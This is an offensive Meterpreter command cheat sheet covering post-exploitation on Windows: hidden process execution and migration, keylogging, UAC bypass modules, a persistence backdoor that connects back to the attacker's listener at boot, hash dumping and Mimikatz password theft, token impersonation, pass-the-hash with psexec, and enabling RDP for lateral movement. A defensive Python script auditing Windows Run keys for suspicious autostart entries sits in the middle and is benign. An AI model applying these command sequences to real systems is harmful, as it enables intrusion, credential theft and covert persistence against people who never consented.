Meterpreter Commands
1. Basics
help
--> List available commands
sysinfo
--> Displays system info
getuid
--> List current session owner
sessions -i 2
--> Change to session 2
shell
--> Drop to interactive shell
channel -i 1
--> Change to shell in channel 1
background
--> Background session to interact with msfconsole
upload {local path} {victim path}
--> Upload a file
download {path}
--> Download file
reg {Command}
--> Interacts with registry (reg by itself will list syntax)
execute -f cmd.exe -i
--> Execute cmd.exe and interact
execute -f cmd.exe -i -H -t
--> Execute cmd as hidden process and with all tokens
- Powershell
load powershell
powershell_execute
--> Execute a PowerShell statement, including complex statements separated by semicolons
powershell_import
--> Import a local PowerShell script to execute on the remote system over the Meterpreter channel
powershell_shell
--> Launch an interactive PowerShell shell
powershell_session_remove
--> Used to remove a PowerShell session when created using execute/import/shell with the -s argument
2. Host Reconnaissance
- List running processes on a system
ps
--> List processes
getpid
--> List current PID
migrate {PID}
--> Migrate to another PID
post/windows/manage/migrate
--> Make meterpreter migrate to another process.
run service_manager -l
--> Lists running services on Windows.
If we are against a non-interactive logon in which the explorer.exe process does not exist, we can create a hidden instance of notepad and migrate into it:
execute -H -f notepad
migrate {PID}
- Screenshots
screengrab
--> Run plugin to capture screenshot of user session
- Keylogger
keyscan_start
--> Start keylogger
keyscan_stop
--> Stop keylogger
keyscan_dump
--> Dump keylogger
3. Privilege Escalation
getsystem
--> Attempts to elevate privileges.
post/windows/gather/win_privs
--> Determine privilege information.
exploit/windows/local/bypassuac_vbs
--> Attempts to bypass UAC in order to escalate privileges.
windows/local/bypassuac_fodhelper
--> Attempts to bypass UAC with the fodhelper method; this should work with Defender disabled.
4. Persistence
The exploitation process works this way:
Upload the backdoor on the victim
Execute the file
At fixed intervals (e.g. 5, 6 or 10 seconds), it will try to connect back to our listener
Run it automatically at boot
Depending on the OS, this can be done by editing the Windows registry, services, schedules, rc.local, init.d
Thanks to Metasploit, the entire process can be completely automated.
meterpreter > run persistence -h
-A --> starts the handler on our machine
-X --> start the agent at boot
-i 5 --> connection attempt every 5 seconds
-p 8080 --> the port for the connect back
-r [IP_Address] --> our IP address
Then we can check it:
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v nZvDeQvFvEi
meterpreter > ls C:\\Windows\\TEMP\\fl*
Once the process is complete, if we want to get a session on the target machine, we have to start the listener and wait for incoming connections. We can do it by using the exploit/multi/handler
module.
Notice that we have to set the same options set with persistence: same payload, IP address, and local port.
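The two checks above (the Run key value and the dropped file under C:\Windows\TEMP) are also what a defender looks for when auditing autostart entries. The script below is an added example, not part of these notes and not Metasploit code: it parses constructed `reg query`-style output for the Run key (the nZvDeQvFvEi value name is taken from the notes above, the file name is made up) and flags entries that launch from a temp or user-writable directory or autostart a script file. The environment-variable expansion uses fixed default values, which is an assumption for the offline example.

```python
import re
from typing import Dict, List

# Constructed sample in the shape of `reg query ...\Run` output.
# Assumption: not captured from a real host; the nZvDeQvFvEi value name is the
# one shown in the notes above, the flabc.vbs file name is made up.
SAMPLE_RUN_KEY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    OneDrive          REG_SZ           "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    nZvDeQvFvEi       REG_SZ           C:\Windows\TEMP\flabc.vbs
"""

# One value line: <name> <REG_type> <data>
_VALUE_LINE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.*?)\s*$")

# Directories a legitimate autostart entry rarely lives in (lower-case, backslash-delimited).
WRITABLE_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\temp\\")
# Script hosts instead of a real executable in an autostart entry are worth a second look.
SCRIPT_EXTS = (".vbs", ".js", ".bat", ".cmd", ".ps1", ".hta")

# Assumption: fixed default expansions, enough for the stock entries in the sample.
_ENV_DEFAULTS = (("%windir%", "C:\\Windows"), ("%systemroot%", "C:\\Windows"), ("%temp%", "C:\\Windows\\TEMP"))


def _command_path(data: str) -> str:
    """Return the program path from a Run value's data: the quoted part, or the first token."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def _expand(path: str) -> str:
    """Expand the few environment variables seen in stock Run entries (case-insensitive)."""
    for var, val in _ENV_DEFAULTS:
        path = re.sub(re.escape(var), lambda _m, v=val: v, path, flags=re.IGNORECASE)
    return path


def parse_run_key(text: str) -> List[Dict[str, str]]:
    """Parse reg-query style output into one dict per value (key header lines are skipped)."""
    entries = []
    for line in text.splitlines():
        m = _VALUE_LINE.match(line)
        if not m or m.group(1).upper().startswith("HKEY_"):
            continue
        name, vtype, data = m.groups()
        entries.append({"name": name, "type": vtype, "data": data, "path": _expand(_command_path(data))})
    return entries


def audit_run_key(text: str) -> List[Dict[str, object]]:
    """Flag Run entries whose program sits in a temp/public directory or is a script file."""
    findings = []
    for entry in parse_run_key(text):
        low = entry["path"].lower()
        reasons = []
        if any(d in low for d in WRITABLE_DIRS):
            reasons.append("launches from a temp/user-writable directory")
        if low.endswith(SCRIPT_EXTS):
            reasons.append("autostarts a script file rather than an executable")
        if reasons:
            findings.append({"name": entry["name"], "path": entry["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_key(SAMPLE_RUN_KEY_OUTPUT):
        print(f"{f['name']}: {f['path']}")
        for r in f["reasons"]:
            print(f"  - {r}")
```

On a live host the same function can be fed the output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKCU equivalent); a matching file under C:\Windows\TEMP is the second artifact to confirm, as the notes above do with `ls`.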
5. Mimikatz
hashdump
--> Dumps local hashes
load mimikatz
--> Loads Mimikatz extension into Meterpreter session.
wdigest
--> Use Mimikatz to retrieve passwords.
6. User Impersonation
To impersonate any logged in users and obtain code execution in their context without access to any passwords or hashes:
load incognito
help incognito
list_tokens -u
impersonate_token corp1\\admin
getuid
- Token Impersonation
For pass-the-ticket attacks, or if we elevate or land on a system where a user is running a process, to impersonate its token:
steal_token {pid}
rev2self
--> Revert to original user
- Pass the Hash
msf exploit(psexec) > set SMBPASS {hash}
msf exploit(psexec) > set SMBUSER {victim username}
SMBUSER => {victim username}
msf exploit(psexec) > set RHOST {victim IP}
RHOST => {victim IP}
msf exploit(psexec) > exploit
7. Lateral Movement
exploit/windows/smb/psexec
run getgui -e
--> Enable the RDP process on target.
rdesktop target -u user -p password
--> Initiate an RDP session with target.